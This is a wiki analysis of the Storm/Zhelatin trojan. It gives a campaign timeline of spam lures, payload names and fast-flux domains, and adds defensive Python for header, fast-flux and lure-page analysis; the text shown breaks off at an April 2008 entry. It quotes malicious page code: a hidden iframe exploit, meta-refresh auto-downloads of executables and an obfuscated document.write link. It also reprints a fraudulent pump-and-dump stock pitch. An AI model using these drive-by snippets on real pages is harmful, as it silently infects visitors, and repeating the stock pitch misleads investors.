Fraud Reports Wiki

Introduction

The Storm trojan is many things. It is arguably a worm, a trojan, malware, the unit element of a botnet, a hijacked host program, a spam sender, a directory harvester, an HTTP website redirector, a member of a DDoS attack force, a zombie. It is spread by spam messages, which can themselves be sent from machines infected with Storm. The spammed message may contain a link to a hijacked host web site, or a web site proxy, which is also running on Storm. The hijacked host may offer an attractive file for download, which once again contains the Storm infection.

Storm is unique in its ability to perform so many functions. As of December 2007, it is the most pervasive and most successful implementation of a multifunctional infection that the Internet has ever witnessed. Its capability to exert control over key sectors of the Internet is unprecedented. Storm is too great a threat to be ignored.

Estimates by researchers for the number of Windows machines infected range from a minimum of 2 million up to 50 million. The scanner used in Botnet Reporting usually accumulates 3,500 - 4,000 hijacked IPs being actively used to host the distribution of Storm in any 24 hour period. The ISPs that are the most infected are located in the US:

  • SBC Global (pacbell, swbell, ameritech, snet)
  • Comcast
  • Roadrunner (rr)

These three ISPs alone account for over 20% of the world's Storm distribution network.

The geographical distribution of Storm hosting sites for the top 10 countries is shown in the Storm Geoprint chart, which shows the accumulated host IPs from October 2007 to April 2008.

Storm Geoprint (chart)

Images

A list of infected machines used in botnets to host spammed sites, including the storm trojan itself, can be found in the spamtrackers download area for botnets.

Gallery image captions (images not reproduced here):

  • Games variant (image: Storm arcade games)
  • Greetings variant (image: Storm-kitty)
  • Krackin variant (image: Storm krackin)
  • Halloween variant 2007 (image: Storm halloween)
  • HPGI pump-and-dump variant 1 (image: Storm HPGI)
  • CYHA pump-and-dump variant 2 (image: Storm CYHA)
  • CYHA pump-and-dump variant 3 (image: Storm CYHA)
  • FAVE stock pump 4a (Dec 15) (image: Storm)
  • BSGC stock pump 4b (image: Storm)
  • BSGC stock pump 5b (image: Storm)
  • BSGC stock pump 5c (image: Storm.BSGC)
  • Dec 28 2007 variant (image: Storm)
  • FAVE stock pump 4b (Jan 2) (image: Storm)
  • FAVE stock pump 4c (Jan 4 2008) (image: Storm)
  • FAVE stock pump 4d (Jan 31) (image: Storm)
  • Hearts (Jan 16) (image: Storm Valentine)
  • Hearts-2 (Jan 31) (image: Storm Heart)
  • Valentine-2.gif (Feb 11) (image: Storm Val1)
  • Valentine-5.gif (Feb 11) (image: Storm Val2)
  • Valentine-4.gif (Feb 11) (image: Storm Val3)
  • Valentine-3.gif (Feb 11) (image: Storm Val4)
  • Valentine-1.gif (Feb 11) (image: Storm Val5)
  • Valentine-7.gif (Feb 11) (image: Storm Val6)
  • Valentine-6.gif (Feb 11) (image: Storm Val7)
  • Valentine-8.gif (Feb 11) (image: Storm Val8)
  • Mar 3 (image: Storm)
  • Apr 1 (image: Storm)
  • Blogspot redirection (Apr 6) (image: Storm Love)
  • Storm Codec (Apr 9) (image: Storm)
  • Storm Love Riddles Jun 1 (image: Storm)
  • Storm China Earthquake Jun 18 (image: Storm-Beijing)
  • Storm Loveletter Jun 28 (image: Storm)
  • Storm Codec (Apr 9) (image: Storm4th)
  • Storm Amero coin (Jul 21) (image: Storm Amero)
  • Storm FBI vs. Facebook (Jul 29) (image: Fbistorm)
  • Storm msnbc campaign (Aug 14) (image: Storm MSNBC)
  • Storm CNN campaign (Aug 14) (image: Storm CNN)
  • January 2009 ecard site (Jan 1, 2009) (image: Jan09ecard)
  • Waledac Obama website spoof (January 17) (image: Obamawaledac)
  • Waledac Valentine's Day theme (Jan/Feb 2009) (image: Waledac020809)
  • Waledac Valentine Puppies (February 9, 2009) (image: Waledacpuppies)
  • Waledac New Years (December 31, 2009) (image: WaledacDec2009)

Sample Spam

Received: from wbmdos (unknown[59.24.160.53]) by example.net (exin02) with SMTP
         id <2007101005045710700k7imqe>; Wed, 10 Oct 2007 05:05:55 +0000
X-Originating-IP: [59.24.160.53]
Received: from bngq ([33.223.57.69]) by wbmdos with Microsoft SMTPSVC(5.0.2195.5329); Wed, 10 Oct 2007 14:05:44 +0900
Message-ID: <470D7DA3.7060302@fnblondonky.com>
Date: Wed, 10 Oct 2007 14:05:44 +0900
From: <nternet@fnblondonky.com>
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: example@example.net
Subject: come get it
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Free games, What more do we need to say? http://76.180.***.***/

In this example, it is possible that the sending IP address, 59.24.160.53, was infected with Storm, and that it was Storm that sent the message. It is definite that the web site IP, 76.180.***.***, was a distributor of Storm. The site at that address is designed to attract younger Internet users: previously it was offering a tempting 1,000 different arcade games for free at the click of an icon, and now it masquerades as a greetings club with a funny kitten animation.
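The sample above has two Received: headers, and only the one written by the receiving MTA (example.net) is trustworthy; the inner "Microsoft SMTPSVC" hop is supplied by the sender and can be forged. The following is an added example (not from the wiki) that walks a Received: chain top-down, takes the connecting IP from the first hop written by a trusted host, and lists the sender-supplied hops below it as untrusted. The header sample is constructed from the one shown above; `example.net` as the trusted MX is an assumption.

```python
import re

# Constructed sample, modelled on the Storm spam headers quoted above (same hosts and IPs).
SAMPLE_HEADERS = """\
Received: from wbmdos (unknown[59.24.160.53]) by example.net (exin02) with SMTP
         id <2007101005045710700k7imqe>; Wed, 10 Oct 2007 05:05:55 +0000
X-Originating-IP: [59.24.160.53]
Received: from bngq ([33.223.57.69]) by wbmdos with Microsoft SMTPSVC(5.0.2195.5329); Wed, 10 Oct 2007 14:05:44 +0900
Message-ID: <470D7DA3.7060302@fnblondonky.com>
From: <nternet@fnblondonky.com>
Subject: come get it
"""

RECEIVED = re.compile(r"Received:\s*from\s+(\S+)\s*(\([^)]*\))?\s*by\s+(\S+)", re.I)
IPV4 = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")


def unfold_headers(raw):
    """Join continuation lines (leading whitespace) so each header is one logical line."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines


def parse_received(header):
    """Pull (from name, from IP, by host, comment) out of one Received: header, or None."""
    m = RECEIVED.match(header)
    if not m:
        return None
    name, comment, by = m.groups()
    comment = comment or ""
    ip = IPV4.search(comment)
    return {"from": name, "ip": ip.group(1) if ip else None, "by": by, "comment": comment}


def analyse_received_chain(raw, trusted_hosts):
    """Walk the Received: headers top-down (most recent hop first).

    Only hops written by a host we trust (our own MX) are evidence; the connecting
    IP they record is the real sender.  Every Received: header below that one was
    supplied by the sender itself and may be forged, like the Microsoft SMTPSVC hop
    that claims the mail originated at 33.223.57.69.
    """
    hops = [h for h in map(parse_received, unfold_headers(raw)) if h]
    result = {"connecting_ip": None, "no_rdns": False, "untrusted_hops": []}
    for i, hop in enumerate(hops):
        if hop["by"] in trusted_hosts:
            result["connecting_ip"] = hop["ip"]
            # "unknown[ip]" means our MX could not reverse-resolve the client
            result["no_rdns"] = "unknown" in hop["comment"].lower()
            result["untrusted_hops"] = hops[i + 1:]
            break
    return result


if __name__ == "__main__":
    r = analyse_received_chain(SAMPLE_HEADERS, trusted_hosts={"example.net"})
    print("real sender:", r["connecting_ip"], "(no rDNS)" if r["no_rdns"] else "")
    for hop in r["untrusted_hops"]:
        print("sender-supplied hop, not trusted:", hop["from"], hop["ip"])
```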

If we look at the links on that page, we discover that every link is for the same file, which in this case is the Storm trojan itself:

Storm links

Also known as

Wikipedia lists various names for this trojan:

  • CME-711 (MITRE)
  • W32/Nuwar@MM and Downloader-BAI (specific variant) (McAfee)
  • Troj/Dorf and Mal/Dorf (Sophos)
  • Trojan-Downloader.Win32.Small.dam
  • Trojan.DL.Tibs.Gen!Pac13 ("FSEC")
  • Trojan.Downloader-647
  • Trojan.Peacomm (Symantec)
  • TROJ_SMALL.EDW (Trend Micro)
  • Win32/Nuwar (ESET)
  • Win32/Nuwar.N@MM!CME-711 (Windows Live OneCare)
  • W32/Zhelatin (F-Secure and Kaspersky)
  • Trojan.Peed, Trojan.Tibs (BitDefender)

Multi-AV scan of happy2008.exe, taken on 26 Dec 2007:

  • AntiVir - Found WORM/Zhelatin.ob
  • Authentium - W32/StormWorm.P
  • AVG Antivirus - Found Downloader.Tibs
  • BitDefender - Found Trojan.Peed.IRE
  • Dr.Web - Found Trojan.Packed.263
  • eTrust-Vet - Win32/Sintun.AT
  • F-Prot Antivirus - Found W32/StormWorm.P
  • F-Secure Anti-Virus - Found Packed.Win32.Tibs.gu
  • Kaspersky Anti-Virus - Found Packed.Win32.Tibs.gu
  • Microsoft - Trojan:Win32/Tibs.gen!ldr
  • Prevx1 - Stormy:Worm-All Variants
  • Sophos Antivirus - Found Mal/Dorf-C
  • Symantec - Trojan.Peacomm.D
  • Webwasher-Gateway - Worm.Zhelatin.ob

Removal

In September 2007, Microsoft added detection and removal of Storm to its Malicious Software Removal Tool, which was included in the Windows Automatic Update package. On September 25th, Microsoft announced that MSRT may have helped reduce the size of the Storm botnet by up to 20%. The new release, as claimed by Microsoft, removed Storm from approximately 274,372 infected systems out of 2.6 million scanned Windows systems. However, according to senior security staff at Microsoft, "the 180,000+ additional machines that have been cleaned by MSRT since the first day are likely to be home user machines that were not notably incorporated into the daily operation of the 'Storm' botnet," indicating that the MSRT cleaning may have been symbolic at best.

Removal instructions vary by Antivirus vendor.

For Symantec, see the Storm write-up page.

For McAfee, you need to be at the latest levels.

For F-Secure, you need to be at the latest level.

Microsoft provides a Malicious Software Removal Tool (MSRT) which removes the Storm infection.

Storm / Zhelatin timeline

Feb 2007 - April 2007

In a series of social engineering releases designed to infect multiple different target sectors, this worm has appeared under many different forms. Target sectors include children, people intrigued by whimsical greeting cards, sports fanatics, the security conscious, people seeking love, people intrigued by war, news watchers, people who like to offer help, problem solvers, volunteers, game players, gamblers, etc. By varying the offering in each wave of spam, the perpetrator has sought to maximize the infection rate among the target victims.

The timeline of spam attacks illustrating the different target sectors is shown below.

February 11, 2007

Storm worm was being spread over Instant Messenger services

LOL ;-)
http://***.***.***.***/ag.***(active now)

February 14

A Zhelatin variant used Valentine's Day mail subjects such as

  • Valentines Day Dance
  • The Valentines Angel
  • Valentines Day is here again
  • Valentine’s Love
  • Valentine’s Night
  • Valentine Letter
  • Your Love on Valentine’s

Payloads: Flash Postcard.exe, flash postcard.exe, greeting postcard.exe, Greeting Postcard.exe, greeting card.exe, Greeting Card.exe, postcard.exe, Postcard.exe

April 9

A World War III between the USA and Iran theme, with subjects such as

  • USA Missle Strike: Iran War just have started
  • Israel Just Have Started World War I II
  • Iran Just Have Started World War III
  • USA Just Have Started World War III
  • Missle Strike: The USA kills more then 20000 Iranian citizens

Payloads: "News.exe" , "Movie.exe" , "Read_Me.exe" , "Click_Me.exe" , "Video.exe" , "Read_More.exe"

April 12

The lovers' worm, with subjects like

  • A Toast My Love
  • A Token of My Love
  • Come Dance with Me
  • Come Relax with Me
  • Destiny
  • Dream of You
  • Eternal Love
  • Eternity of Your Love

Payloads included Love Card.exe, Love Postcard.exe, My Love.exe, Postcard.exe

April 13

Bogus virus or worm alert, with subjects like

  • Worm Alert!
  • Worm Detected!
  • Virus Alert!
  • Virus Activity Detected!

Payload file names now included a random component:

  • patch-[Random 4 digits].zip
  • removal-[Random 5 digits].zip
  • hotfix-[Random 5 digits].zip
  • bugfix-[Random 5 digits].zip

June 2007 - August 2007

June 16

Greetings on .hk domains; the message body contained links to many different .hk domains. Subjects were typically

  • For You....My Love

  • Gday
  • Gday, Bud
  • Gday, Pal
  • Good day!
  • Hello
  • Hello, Bud

Payload: fun.exe (also some MS exploits in the web page)

June 22

Greeting cards from a friend

  • You've received a postcard from a family member!
  • Your family member has sent you a postcard from greetingcards.com.
  • You've received a greeting card from a friend!
  • You've received a greeting postcard from a worshipper!

Payload: ecard.exe

July 8

These masquerade as malware patches, with subject lines such as "Trojan Detected!"

Payload: patch.exe

August 15

Subject: XXX e-card (XXX being, for example, Birthday or Musical)

Payload: msdataaccess.exe

August 21

When someone follows the link in the spam, the site claims that you need a Secure Login Applet installed on your computer. The payload is called "applet.exe".

Spam subjects:

  • Dated Confirmation
  • Internal Support
  • Internal Verification
  • Login Verification
  • Membership Details
  • New Member Confirmation
  • Registration Confirmation
  • User Services

August 25

This one masquerades as an ecard as usual. Spam subjects:

  • A card for you
  • Here is your E-greeting
  • Someone sent you an Ecard
  • This is for you
  • You have a new eCard from...?
  • You have received an eCard

The link in the body of the text changed from an IP (http://***.***.***.***) to a name (http://example.com)

August 26

Zhelatin now spams with a YouTube video lure.

Spam subjects include

  • are you kidding me? lol
  • Dude your gonna get caught, lol
  • Dude, what if your wife finds this?
  • man, who filmed this thing?
  • HAHAHAHAHAHA, man your insane!

Payload = "video.exe"

August 29

The subjects used include

  • Could you give us a hand?
  • Could you give us your opinion?
  • Put in your two cents
  • We could use your help

Payload = "setup.exe"

August 30

The subjects of spams:

  • Cool Video is out
  • dude this is not even on MTV yet
  • Hot new video
  • OMG, check out the new video
  • this video is not out yet
  • this video rocks
  • your gonna love this, lol

The page says: "If the video does not start playing, you need to load the right codec. Click on the link to install it."

Payload = "codec.exe"

September 2007 - December 2007

September 14

Storm Trojan adopted a Football theme by offering a "game tracking system":

  • Are you ready for football season?
  • Are you ready for some football?
  • Do you have your NFL Game List?
  • Football Fan Essentials
  • Football Season Is Here!
  • FOOTBALL! Are You ready?
  • Free NFL Game Tracker

Payload: tracker.exe

September 17

Spreading with 1000+ free games as the attraction. The spams used subjects such as

  • 1000+ Free Games!
  • GAMES! GAMES!
  • Stop paying for games
  • Thousands of hours of fun, for free
  • Play all your favorite games for free
  • Wow, cool games!


Payload = "ArcadeWorld.exe"

October 12

The laughing psycho kitty cat ecard. The subjects include

  • Someone is thinking of you! Open your ecard!
  • We have a ecard greeting for you.
  • We have a ecard surprise!

Payload = SuperLaugh.exe

October 17

The Krackin site. The sample spam varies, but the web site purports to provide virus protection and IP blocking. The target audience is the security-conscious user.

All the new movies music and more. In one place. The Krackin network.
http://***.***.***.***

Payload: krackin.exe

October 28

The Halloween version, where the target audience is the seasonal fun lover. Typical subjects include

  • Make him dance
  • Man this is funny
  • To much fun

Sample spam -

The Dancing Skeleton

Do You Want To See New Funny Sexual Helloween Game with Dancing Skeleton? Just Click Here
Via Email, MSN, or IRC

Payload: halloween.exe or dancer.exe

November 12

A pump-and-dump scam was loaded onto the Storm hosting bots, replacing the existing payload. At the URL http://xxx.xxx.xxx.xxx/stock.html it contained:

Global Economy Newsletter

Hemisphere Gold Inc. (HPGI)
Current: $1.00
Market Alert - Strong Buy

Gold investors find safe haven as the US Dollar continues to drop throughout 2007.

Market Status:

Since 2006 market annalists predicted gold to hit $800 per ounce within two years. Gold has hit $812 an ounce just one year later due to depleted gold supplies and a falling US Dollar.

In an effort to find more gold, recent findings of large Gold deposits in Suriname has turned this small country into a modern day gold rush.

Hemisphere Finds Gold!

Hemisphere Gold.s Properties are sitting right in the middle of the largest gold mines in the region and advanced exploration has already found gold deposits as high as 3.55 ounces/ton. This region has already become know as the Gold Belt.

6 Reasons To Own HPGI

1: Gold is on a Bull Run, climbing over $200 an ounce in just 9 months.
2: Gold demand is at record highs and is expected to continue increasing.
3: Hemisphere has the cutting edge technology and financial team to take this all the way.
4: Hemispheres property sits right in the middle of the Gold Belt where over 50 million ounces of gold have already been extracted.
5: Recent findings have pushed share prices up over 120% in the last 30 days.
6: Gold is a traditional safe haven for investors in times of trouble as it keeps its value greater than currency.

Hemisphere is launching a full scale marketing campaign with coverage already found on sites like Stockguru.com. With huge results already confirmed HPGI is moving into the final stages of exploration. This leaves nothing left but mining a large deposits in a primed market. HPGI should be on the top of your list for your next investment consideration.

November 18

The payload (dancer.exe) has generally been removed, so that clicking on the Download area produces

404 Not Found
nginx/0.5.17

However, the site contains a malicious "iframe" exploit in its code:

<iframe src="/cgi-bin/in.cgi?p=user1" width="0" height="0"></iframe>

This exploit is analyzed at the disog.org site and described at this blogspot.

This same iframe injection has also been found on general web sites as a "drive-by" installation.

November 26

The storm host machines returned only a blank page. Attempts to load any pages - such as /stock.html - returned a "page not found" condition:

404 Not Found
nginx/0.5.17

December 11

The current payload on the Storm site servers is the file "sony.exe", which McAfee identifies as Nuwar@MM.

It contains the following trojan fingerprints within its code:

Software\Microsoft\Windows\CurrentVersion\Run
noskrnl.exe
noskrnl.config

These fingerprints are covered in the Symantec Technical description of this trojan.

The trojan code can be viewed safely without downloading. You can search for the fingerprint string noskrnl.config to verify that it is the Storm infection.

December 12/13

The image file installed on the hosts carries a pump-and-dump securities fraud scam pushing the Pink Sheets stock CYHA (Cyberhand Technologies).

December 14

The image file is replaced with two alternative files pumping two stocks FAVE and BSGC.

FAVE is listed in a press release as Simulated Environment Concepts, Inc. (PINKSHEETS: FAVE). The company web site is http://www.spacapsule.com/

Press Contact: IR Complete, Inc. 919-468-4511

BSGC is Big String Corporation, mentioned in a November Penny Investor listing as a #1 pick. The company web site is at http://www.bigstring.com


http://finance.yahoo.com/q/bc?s=BSGC.OB&t=3m

December 24

The Christmas lure is a predictable ploy: a fake greeting card. Typical subject lines:

  1. Merry Christmas To All
  2. Warm Up this Christmas
  3. Mrs. Clause Is Out Tonight!
  4. The Twelve Girls Of Christmas
  5. Jingle Bells, Jingle Bells
  6. Cold Winter Nights

Sample message bodies:

.. sent you an e-card from our Free Electronic Card Service.
To view your customized greeting card, simply click on the following Internet location
http://www.americangreetings.b719.cn/[whatever]
Regards Webmaster

Winter can be cold. I bet you could use a little something to warm you
up. Take 2 min out of your day. You wont regret it. ;-)
http://merrychristmasdude.com/

Payloads: happy2008.exe and sony.exe

December 26

Post Christmas Storm spams portray a New Year theme. Subjects include

  • Opportunities for the new year
  • Message for new year
  • New Year wishes for you
  • Blasting new year
  • It’s the new Year
  • Joyous new year
  • New Hope and New Beginnings

Typical URLs:

  • uhavepostcard.com
  • happycards2008.com
  • newyearcards2008.com
  • newyearwithlove.com
  • familypostcards2008.com

Payloads: "happy2008.exe", "happy-2008.exe", "happynewyear2008.exe", "happynewyear.exe", "stripshow.exe", "happy_2008.exe"

The link to the site name is obfuscated:

document.write( unescape(
'%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E' ) );

Domain names are now being registered in Russia, with a bank of name servers and the usual fast-flux behavior:

 Domain Name: HAPPYCARDS2008.COM
 Registrar: ANO REGIONAL NETWORK INFORMATION CENTER DBA RU
 Whois Server: whois.nic.ru
 Referral URL: http://www.nic.ru
 Name Server: NS.HAPPYCARDS2008.COM
 Name Server: NS2.HAPPYCARDS2008.COM
 Name Server: NS3.HAPPYCARDS2008.COM
 Name Server: NS4.HAPPYCARDS2008.COM
 Name Server: NS5.HAPPYCARDS2008.COM
 Name Server: NS6.HAPPYCARDS2008.COM
 Name Server: NS7.HAPPYCARDS2008.COM
 Name Server: NS8.HAPPYCARDS2008.COM
 Name Server: NS9.HAPPYCARDS2008.COM
 Name Server: NS10.HAPPYCARDS2008.COM
 Name Server: NS11.HAPPYCARDS2008.COM
 Name Server: NS12.HAPPYCARDS2008.COM
 Name Server: NS13.HAPPYCARDS2008.COM
 Status: clientTransferProhibited
 Updated Date: 26-dec-2007
 Creation Date: 26-dec-2007
 Expiration Date: 26-dec-2008

December 29

Additional name servers added:

  • freshcards2008.com
  • familypostcards2008.com
  • merrychristmasdude.com
  • newscorpalerts.com
  • happy2008toyou.com
  • happysantacards.com
  • hellosanta2008.com
  • hohoho2008.com
  • parentscards.com
  • postcards-2008.com
  • santapcards.com
  • santawishes2008.com

January 2008 - March 2008

January 9, 2008

For a short time the Storm network was used in a phishing operation aimed at the Halifax and Barclays banks. The fake domain names registered were i-halifax.com and i-barclays.com.

January 10

The domain names used to resolve the 0-refresh fast-flux addresses were all suspended by the registrars in a synchronized move. Only existing infected machines were able to join the network, and new infections were effectively unable to locate any other network members. Any infected machine that was restarted would be likely to fail to reconnect. It is expected that this will result in a major reduction of bots within the standard 48 hour Internet caching period.

January 16

Storm Valentine (image)

Spamming resumed using a raw IP address. The subject line was "With Love!".

The payload file, withlove.exe or with_love.exe, was loaded by an obfuscated JavaScript.


January 31

Sample spam contents:

Subject: You won't spend to much for these meds!
Dreams can cost less here! http://91.122.38.100/xfj/

The IP address in the spam corresponds to a Storm-infected machine. By repeatedly loading the same URL on that or any other Storm IP with /xfj/ (a randomly chosen subdirectory name) appended, you find redirections to exactly 8 Canadian Pharmacy sites:

  1. andconsider.com
  2. bringinstrument.com
  3. endscience.com
  4. measureremember.com
  5. owndeep.com
  6. speakpound.com
  7. tellthrough.com
  8. thanpopulate.com

Canadian Pharmacy sites are in turn hosted on another fast-flux botnet. Different randomly selected subdirectory names yield the same result.

Geographic fingerprinting reveals completely different topologies for these two botnets.

The geo-print for Storm is shown under the topic Botnet hosting (image Bot STO), and the one for Canadian Pharmacy in the image Bot PUF.

February 7

The infected page was changed to contain obfuscated code.


February 10

Redirections from Storm infections to fake Canadian Pharmacy sites:

  1. interestquiet.com
  2. chickher.com
  3. byoperate.com
  4. elementgrand.com
  5. tenpitch.com
  6. roundtoward.com
  7. twoinstant.com

February 11

Eight new images were introduced with a Valentine's theme. The virus payload (valentine.exe) is now loaded more directly, using a meta "refresh" so that the download starts even without a click, to ensure a higher infection rate:

<html xmlns="http://www.w3.org/1999/xhtml">  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta http-equiv="refresh" content="5;url=valentine.exe">
<title>Your Valentine</title>
<body>
<center>
<a href="valentine.exe"><img border=0 src="5.gif"><br></a>
</body>
</html>

The random gif with the unconvincing pump and dump stock scam has been removed.

Domain names used to serve the 0-fast-flux network:

  • moonstarfood.com (removed)
  • destroythemoon.com (removed)

Name servers were on

ns.llldddnnn.com 76.212.174.58
ns2.llldddnnn.com 68.252.56.21
ns3.llldddnnn.com 64.221.169.181
ns4.llldddnnn.com 75.132.160.97
ns5.llldddnnn.com 68.184.51.232
ns6.llldddnnn.com 80.197.35.241
ns7.llldddnnn.com 90.150.141.112
ns8.llldddnnn.com 78.8.106.11
ns9.llldddnnn.com 59.31.54.198
ns10.llldddnnn.com 60.53.245.92
ns11.llldddnnn.com 98.206.242.41
ns12.llldddnnn.com 76.97.95.128
ns13.llldddnnn.com 24.98.214.216
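The name-server bank above is what a fast-flux network looks like from the outside: 13 hosts on 13 unrelated consumer-ISP networks, serving a zone whose records refresh with a 0-second TTL. The following is an added example (not the wiki's own tooling) that scores a set of addresses for that pattern and measures how fast a domain's A-record answers rotate. `NS_IPS` are the 13 addresses listed above; the control set, the successive A-record answers and the thresholds (`min_hosts`, `min_dispersion`, `max_ttl`) are constructed assumptions for illustration.

```python
import ipaddress

# The 13 name-server addresses listed on this page for the Feb 11 0-fast-flux domain.
NS_IPS = ["76.212.174.58", "68.252.56.21", "64.221.169.181", "75.132.160.97",
          "68.184.51.232", "80.197.35.241", "90.150.141.112", "78.8.106.11",
          "59.31.54.198", "60.53.245.92", "98.206.242.41", "76.97.95.128",
          "24.98.214.216"]

# Constructed control: a conventionally hosted zone, two name servers on one /24, day-long TTL.
STATIC_NS_IPS = ["192.0.2.10", "192.0.2.11"]

# Constructed successive A-record answers for one flux domain (RFC 5737 test addresses),
# as a resolver honouring a 0-second TTL would see them a couple of minutes apart.
A_LOOKUPS = [
    ["192.0.2.10", "192.0.2.11", "198.51.100.5"],
    ["203.0.113.7", "192.0.2.10", "198.51.100.9"],
    ["203.0.113.20", "192.0.2.33", "198.51.100.5"],
]


def network_dispersion(ips, prefix_len=16):
    """Fraction of addresses that fall in distinct /prefix_len networks (1.0 = all unrelated)."""
    nets = {ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False) for ip in ips}
    return len(nets) / len(ips)


def looks_fast_flux(ips, ttl, min_hosts=5, min_dispersion=0.8, max_ttl=300):
    """Heuristic (thresholds are assumptions): many hosts, spread over unrelated
    networks, and a tiny TTL.

    A hosting provider's name servers sit in a few of its own prefixes with long
    TTLs; a flux net built from infected home machines is scattered across
    consumer ISPs (NS_IPS spans 13 different /16s) and keeps the TTL near zero so
    addresses can be swapped as bots come and go.
    """
    return (len(ips) >= min_hosts
            and network_dispersion(ips) >= min_dispersion
            and ttl <= max_ttl)


def answer_churn(lookups):
    """(distinct IPs seen overall, IPs per answer): a ratio well above 1 means rotation."""
    seen = set()
    for answer in lookups:
        seen.update(answer)
    per_answer = sum(len(a) for a in lookups) / len(lookups)
    return len(seen), per_answer


if __name__ == "__main__":
    print("NS bank dispersion:", network_dispersion(NS_IPS))
    print("fast-flux?", looks_fast_flux(NS_IPS, ttl=0))
    print("control fast-flux?", looks_fast_flux(STATIC_NS_IPS, ttl=86400))
    print("A-record churn (distinct, per answer):", answer_churn(A_LOOKUPS))
```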

February 14

Current Canadian Pharmacy redirections for Storm nginx/0.5.17 URLs in the format http://xxx.xxx.xxx.xxx/junk/

  • chancetoo.com
  • enoughbreak.com
  • gonebox.com
  • largespeech.com
  • planepound.com
  • quickwant.com
  • safecause.com


The randomized gif for a pump-and-dump stock, previously loaded with a URL in the format http://xxx.xxx.xxx.xxx/junk.gif, remains removed.

March 3

The image changed to a "FunnyPostCard" lure. The payload was ecard.exe, and a download is attempted even if the victim does not click on the image, by using an HTTP refresh:

<meta http-equiv="Refresh" content="5; URL=ecard.exe">
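The Storm pages quoted in this timeline use three no-click tricks: a meta refresh pointing at an .exe (the Valentine and FunnyPostCard pages), an anchor target hidden inside document.write(unescape('...')) (the December 26 page), and a zero-size iframe (the November 18 page). The following is an added triage example (not from the wiki) that decodes the unescape() payload and scans the resulting markup for all three; the two sample fragments are constructed from the sources quoted above, and the executable extension list is an assumption.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed fragments modelled on the page sources quoted in this timeline.
OBFUSCATED_JS = """document.write( unescape(
'%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E' ) );"""

VALENTINE_HTML = """<html xmlns="http://www.w3.org/1999/xhtml">
<meta http-equiv="refresh" content="5;url=valentine.exe">
<title>Your Valentine</title>
<body><center>
<a href="valentine.exe"><img border=0 src="5.gif"><br></a>
<iframe src="/cgi-bin/in.cgi?p=user1" width="0" height="0"></iframe>
</body></html>"""

UNESCAPE_CALL = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)")
REFRESH_URL = re.compile(r"url\s*=\s*['\"]?([^'\"\s]+)", re.I)
EXECUTABLE = (".exe", ".scr", ".zip")   # assumption: extensions worth flagging


def js_unescape(s):
    """Decode like JavaScript unescape(): %uXXXX code units, then %XX as Latin-1 bytes."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


def decode_document_writes(src):
    """Return every string the page injects through document.write(unescape('...'))."""
    return [js_unescape(m) for m in UNESCAPE_CALL.findall(src)]


class LureScanner(HTMLParser):
    """Collect (kind, target) findings for the auto-download tricks seen on Storm pages."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = REFRESH_URL.search(a.get("content") or "")
            if m:
                self.findings.append(("meta-refresh", m.group(1)))
        elif tag == "a":
            href = a.get("href") or ""
            if href.lower().endswith(EXECUTABLE):
                self.findings.append(("exe-link", href))
        elif tag == "iframe" and (a.get("width") == "0" or a.get("height") == "0"):
            self.findings.append(("hidden-iframe", a.get("src") or ""))


def scan_lure_page(src):
    """Scan the static markup plus anything document.write(unescape()) would add at runtime."""
    scanner = LureScanner()
    scanner.feed(src)
    for injected in decode_document_writes(src):
        scanner.feed(injected)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, target in scan_lure_page(VALENTINE_HTML) + scan_lure_page(OBFUSCATED_JS):
        print(f"{kind:14s} -> {target}")
```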

Redirection sites for Canadian Pharmacy and Cheap Drugs Online Store

  • picksuch.com
  • wonderright.com
  • fallbroad.com
  • pharmapillsforu.com
  • rxpills4u.com
  • cheapestpillshere.com
  • ranglad.com
  • speakplant.com

March 4

A new wave of spams that repeat an earlier phase of Storm propagation via fake greeting cards.

Subjects:

  • Your ecard joke is waiting
  • You have an ecard
  • We have a ecard surprise
  • Someone Just sent you an ecard
  • Did you open your ecard yet
  • ecard waiting for you
  • Open your ecard
  • new ecard waiting
  • Now this is funny
  • online greeting waiting
  • sent you an ecard

Body:

  • laughing Funny Card
  • You have been sent a Funny Postcard
  • You have been sent the Funny Ecard
  • original Funny Card
  • Someone Sent you this Funny Ecard
  • your funny postcard
  • original Funny Postcard
  • sent a Funny Postcard
  • personal funny postcard
  • FunnyPostcard
  • laughing funny postcard

March 20

The domain name used to interconnect Storm sites was ibank-halifax.com, registered with the Russian company ANO REGIONAL NETWORK INFORMATION CENTER. On March 18, 2008 it was suspended:

  • Status: clientHold
  • Status: clientTransferProhibited

However, existing Storm hosts were still performing redirections to spam sites registered with Xin Net:

  • ED Express
    • surfpart.com
    • darksidehq.com
    • superwildside.com
    • twinsideauto.com
  • Pharmacy Express
    • daysidehomes.com
    • sideeventsonline.com
    • flipsidesite.com
  • United ED Meds
    • esideeffect.com

All of these sites loaded their images from the one Image Server - oleroneg.info (Sponsoring Registrar: Blog.com Digital Communications Inc.)

March 31

The latest edition had an April Fool's Day theme. The picture is of a jester with the placard "April Fool" and trailing a slogan "Kick me hard". Sample subject lines were

  • All Fools' Day
  • Doh! All's Fool.
  • Doh! April's Fool.
  • Gotcha!
  • Surprise! The joke's on you.

Payloads included funny.exe, foolsday.exe, kickme.exe

April 2008 - July 2008

April 6

Google Blogspot's much-abused redirection was used to draw victims into infected distribution sites. Spammed links in the form http://some-name.blogspot.com would redirect with an HTTP refresh to an infection site.

April 9

Datum: Tue, 8 Apr 2008 22:59:22 -0400   
Subject: With all my love
   
